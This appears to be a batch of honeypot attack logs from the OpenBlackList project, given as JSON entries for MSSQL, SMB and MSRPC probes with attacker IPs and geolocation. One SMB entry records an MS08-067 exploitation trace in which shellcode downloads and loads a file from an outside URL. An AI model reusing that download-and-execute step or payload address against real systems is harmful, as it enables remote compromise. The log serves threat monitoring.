2016-08-01. MSSQL attacked from 117.68.9.76,China

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-20 06:13:18”,        “source of the attack”: {            “ip”: “117.68.9.76”,            “domain”: “AS4134-CHINANET anhui province networkChina TelecomNo.31”,            “geoloc”: “China”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “MSSQL”,        “protocol”: “tcp”,        “source port”: 61134,        “destination port”: 1433,        “login”: [],        “mssql command”: [],        “mssql fingerprint”: []    }}

2016-08-01. SMB attacked from 186.178.28.171,Ecuador

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-20 08:07:14”,        “source of the attack”: {            “ip”: “186.178.28.171”,            “domain”: “171.28.178.186.static.pichincha.andinanet.net”,            “geoloc”: “Ecuador”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “SMB”,        “protocol”: “tcp”,        “source port”: 3617,        “destination port”: 445,        “dce/rpc”: [            {                “DCE/RPC bind”: [                    {                        “servicename”: “SRVSVC”,                        “uuid”: “4b324fc8-1670-01d3-1278-5a47bf6ee188”,                        “transfersyntax”: “8a885d04-1ceb-11c9-9fe8-08002b104860”                    }                ]            },            {                “DCE/RPC request”: [                    {                        “operationname”: “NetPathCompare”,                        “operationnumber”: 32,                        “servicename”: “SRVSVC”,                        “uuid”: “4b324fc8-1670-01d3-1278-5a47bf6ee188”                    },                    {                        “operationname”: “NetPathCanonicalize”,                        “operationnumber”: 31,                        “servicename”: “SRVSVC”,                        “uuid”: “4b324fc8-1670-01d3-1278-5a47bf6ee188”                    }                ]            }        ],        “vulnerability exploited”: “MS08-67”,        “profiling”: [            {                “call”: “LoadLibraryA”,                “args”: [                    “urlmon”                ],                “return”: “0x7df20000”            },            {                “call”: “URLDownloadToFile”,                “args”: [                    “”,                    “http://100.100.0.249:5906/yhsiq”,                    “x.”,                    “0”,                    “0”                ],                “return”: “0”            },            {                “call”: “LoadLibraryA”,                “args”: [                    “x.”                ],                “return”: “0x00000000”            },            {                “call”: “ExitThread”,                “args”: [                    “0”                ],                “return”: “0”            }        ],        “url offered”: [            “http://100.100.0.249:5906/yhsiq”        ],        “url download”: [],        “action”: []    },    “virus total analysis”: [],    “static analysis with peframe”: []}

2016-08-01. MSSQL attacked from 117.68.9.76,China

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-20 06:13:10”,        “source of the attack”: {            “ip”: “117.68.9.76”,            “domain”: “AS4134-CHINANET anhui province networkChina TelecomNo.31”,            “geoloc”: “China”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “MSSQL”,        “protocol”: “tcp”,        “source port”: 59521,        “destination port”: 1433,        “login”: [],        “mssql command”: [],        “mssql fingerprint”: []    }}

2016-07-30. SMB attacked from 176.80.157.83,Spain

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-22 22:46:46”,        “source of the attack”: {            “ip”: “176.80.157.83”,            “domain”: “83.red-176-80-157.dynamicip.rima-tde.net”,            “geoloc”: “Spain”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “SMB”,        “protocol”: “tcp”,        “source port”: 2501,        “destination port”: 445,        “dce/rpc”: [            {                “DCE/RPC bind”: []            },            {                “DCE/RPC request”: []            }        ],        “vulnerability exploited”: [],        “profiling”: [],        “url offered”: [],        “url download”: [],        “action”: []    },    “virus total analysis”: [],    “static analysis with peframe”: []}

2016-07-30. MSRPC attacked from 123.57.16.72,China

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-22 18:54:23”,        “source of the attack”: {            “ip”: “123.57.16.72”,            “domain”: “AS37963-Aliyun Computing Co.”,            “geoloc”: “China”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “MSRPC”,        “protocol”: “tcp”,        “source port”: 58652,        “destination port”: 135,        “dce/rpc”: [            {                “DCE/RPC bind”: []            },            {                “DCE/RPC request”: []            }        ],        “vulnerability exploited”: [],        “profiling”: [],        “url offered”: [],        “url download”: [],        “action”: []    },    “virus total analysis”: [],    “static analysis with peframe”: []}

2016-07-30. SMB attacked from 188.250.41.79,Portugal

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-22 20:32:32”,        “source of the attack”: {            “ip”: “188.250.41.79”,            “domain”: “bl24-41-79.dsl.telepac.pt”,            “geoloc”: “Portugal”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “SMB”,        “protocol”: “tcp”,        “source port”: 3794,        “destination port”: 445,        “dce/rpc”: [            {                “DCE/RPC bind”: []            },            {                “DCE/RPC request”: []            }        ],        “vulnerability exploited”: [],        “profiling”: [],        “url offered”: [],        “url download”: [],        “action”: []    },    “virus total analysis”: [],    “static analysis with peframe”: []}

2016-08-01. SMB attacked from 186.178.28.171,Ecuador

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-20 08:07:07”,        “source of the attack”: {            “ip”: “186.178.28.171”,            “domain”: “171.28.178.186.static.pichincha.andinanet.net”,            “geoloc”: “Ecuador”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “SMB”,        “protocol”: “tcp”,        “source port”: 2973,        “destination port”: 445,        “dce/rpc”: [            {                “DCE/RPC bind”: []            },            {                “DCE/RPC request”: []            }        ],        “vulnerability exploited”: [],        “profiling”: [],        “url offered”: [],        “url download”: [],        “action”: []    },    “virus total analysis”: [],    “static analysis with peframe”: []}

2016-07-30. MSSQL attacked from 123.126.109.213,China

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-22 21:20:40”,        “source of the attack”: {            “ip”: “123.126.109.213”,            “domain”: “AS4808-China Unicom Beijing province networkChina Unicom”,            “geoloc”: “China”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “MSSQL”,        “protocol”: “tcp”,        “source port”: 53464,        “destination port”: 1433,        “login”: [],        “mssql command”: [],        “mssql fingerprint”: []    }}

2016-07-30. MSSQL attacked from 123.126.109.213,China

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-22 21:20:29”,        “source of the attack”: {            “ip”: “123.126.109.213”,            “domain”: “AS4808-China Unicom Beijing province networkChina Unicom”,            “geoloc”: “China”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “MSSQL”,        “protocol”: “tcp”,        “source port”: 51006,        “destination port”: 1433,        “login”: [],        “mssql command”: [],        “mssql fingerprint”: []    }}

2016-08-01. SMB attacked from 115.178.49.124,Indonesia

{    “project”: “OpenBlackList (https://twitter.com/openblacklist)”,    “author”: “ElCatapan (https://twitter.com/ElCatapan)”,    “attack details”: {        “timestamp”: “2016-06-20 08:02:56”,        “source of the attack”: {            “ip”: “115.178.49.124”,            “domain”: “host-49-124.simaya.net.id”,            “geoloc”: “Indonesia”        },        “honeypot sensor target”: “sensor03”,        “service attacked”: “SMB”,        “protocol”: “tcp”,        “source port”: 2764,        “destination port”: 445,        “dce/rpc”: [            {                “DCE/RPC bind”: []            },            {                “DCE/RPC request”: []            }        ],        “vulnerability exploited”: [],        “profiling”: [],        “url offered”: [],        “url download”: [],        “action”: []    },    “virus total analysis”: [],    “static analysis with peframe”: []}